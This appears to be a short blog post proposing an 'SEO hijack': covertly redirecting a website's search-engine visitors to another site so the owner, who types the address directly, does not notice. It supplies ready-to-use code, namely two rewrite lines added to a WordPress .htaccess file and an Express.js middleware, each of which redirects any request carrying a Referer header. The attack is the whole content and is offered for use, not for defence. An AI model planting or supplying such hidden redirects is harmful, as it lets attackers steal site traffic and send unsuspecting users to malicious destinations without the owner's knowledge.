SEO hijack

I though about an exploit of the deveteam/ owner of a site.
The main way they enter the site is directly by writing the address.
But regular users use search engine to search the site even after the first time.
So if we can hijack that trfic to another website we can do it without the owner notice…

The idea is to identify the referrer header and redirect the user or inject code just to this traffic

htaccess – wordpress/ php websites

For a new installation of WP the .htaccess file look like this :

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

We’ll add to the .htaccess file 2 lines of code :

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{HTTP_REFERER} .
RewriteRule ^(.*)$ http://The_redirected_site.com [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Node.js with express4

We’ll add a middleware, in app.js before the routes :

app.use('*', function (req, res, next) {
  if (typeof req.headers.referer !== 'undefined') {
    res.redirect('http://The_redirected_site.com')
  } else {
    next()
  }
})

References :
install lamp
fix lamp to php5
install WordPress